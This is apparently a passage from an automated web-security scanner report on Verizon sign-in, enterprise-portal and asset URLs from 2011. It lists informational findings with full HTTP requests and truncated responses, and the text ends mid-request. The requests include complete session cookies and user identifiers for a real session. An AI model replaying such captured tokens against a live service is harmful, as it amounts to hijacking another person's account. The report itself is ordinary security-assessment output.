GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:46 GMT
Content-length: 2567
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...

23.3. https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VzVAgent.jsp

Request

POST /aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA= HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp
Content-Length: 96
Cache-Control: max-age=0
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%2BtSa8hin5LSA%3D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:49 GMT
Content-type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 54786

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>Verizon Virtual Agen
...[SNIP]...

23.4. https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VzVirtualAgent.jsp

Request

POST /aims/encore/VzVirtualAgent.jsp HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials
Content-Length: 451
Cache-Control: max-age=0
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

appId=141&h_Brows_Info=&QUESCATNAME=&initQ=Forgot+User+Credentials&referer=https%3A%2F%2Fsignin.verizon.com%2Fsso%2FResetAccount%3FgoFlow%3DresetAccount&sourceTitle=Sign+In&sourceURL=https%3A%2F%2Fsig
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:47 GMT
Content-length: 1625
Content-type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1

<HTML>
<HEAD>
<TITLE>Verizon Virtual Agent</TITLE>
<script language="javascript" src="../includes/scripts/logClientErrors.js"></script>
...[SNIP]...

23.5. https://collaborateext.verizon.com/aims/html/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://collaborateext.verizon.com
Path:	/aims/html/blank.html

Request

GET /aims/html/blank.html HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:52 GMT
Content-length: 175
Content-type: text/html
Last-modified: Wed, 13 Jul 2011 16:56:58 GMT
Etag: "af-4e1dce5a"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body></body></html>

23.6. https://dashboard.opinionlab.com/pv_controlboard.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://dashboard.opinionlab.com
Path:	/pv_controlboard.html

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.7. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:34 GMT
ETag: W/"cbd8-4e228aae"
Vary: accept-encoding
Date: Mon, 05 Sep 2011 22:26:39 GMT
Content-Length: 52184
Connection: keep-alive

CWS ....x..{w\....&.. .
...JSzh.!.$..Ez......D..J..7E...".B...(....(.'...|....../.Lfggwgw.>.$.?...*....6.'. .....J..Y%..iT...o...MU.=(._IJ*44T2TV./.M.............!.x.7.1L.7._X...m.@.... .?_....._p..
...[SNIP]...

23.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Request

Response

23.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Request

Response

23.10. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/LoginFlash.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"faa-4e228aaf"
Vary: accept-encoding
Cache-Control: private, max-age=21778
Date: Mon, 05 Sep 2011 22:26:21 GMT
Content-Length: 4010
Connection: keep-alive

CWS
n...x..X{p..y.]....>.>@..(..H.& ....(....EA&)[.M.............V..vb'q.I\{..,7mS.Mf..T....)n.I.dm7.Q..t:v;..c..O....@..e..b....}......g...!|.....1g=B..j.GhP.).ScA..T2........g..........U..v...{}~...
...[SNIP]...

23.11. https://enterprisecenter.verizon.com/enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp

Request

POST /enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
Content-Length: 1304
Origin: https://enterprisecenter.verizon.com
X-TeaLeaf-Page-Render: 302
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.05.10.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

<ClientEventSet PostTimeStamp="1315279372165" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="302" DateSince1970="1315279364782" PageId="ID22H22M44S480R0.3107682520058006" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Mon, 05 Sep 2011 22:23:17 GMT
Connection: keep-alive
Vary: Accept-Encoding

<html>
<body>
Response

<hr>
Read 1304 bytes in 0ms.

</body>
</html>

23.12. https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do

Request

POST /enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
Content-Length: 233
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

firstName=&lastName=&phoneNumber=&emailAddress=&reenterEmailAddress=&country=-1&address1=&address2=&city=&zipcode=&companyName=&companyCountry=-1&companyAddress1=&companyAddress2=&companyCity=&company
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:25:57 GMT
Content-Length: 45631
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...

23.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/includes/s.gif

Request

GET /enterprisesolutions/staticcontent/includes/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Vary: accept-encoding
Content-Length: 2270
Cache-Control: private, max-age=7174
Date: Mon, 05 Sep 2011 22:23:14 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Verizo
...[SNIP]...

23.14. https://enterprisecenter.verizon.com/future/vzw/css_reference_PatLib/includes/css/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/future/vzw/css_reference_PatLib/includes/css/print.css

Request

GET /future/vzw/css_reference_PatLib/includes/css/print.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; 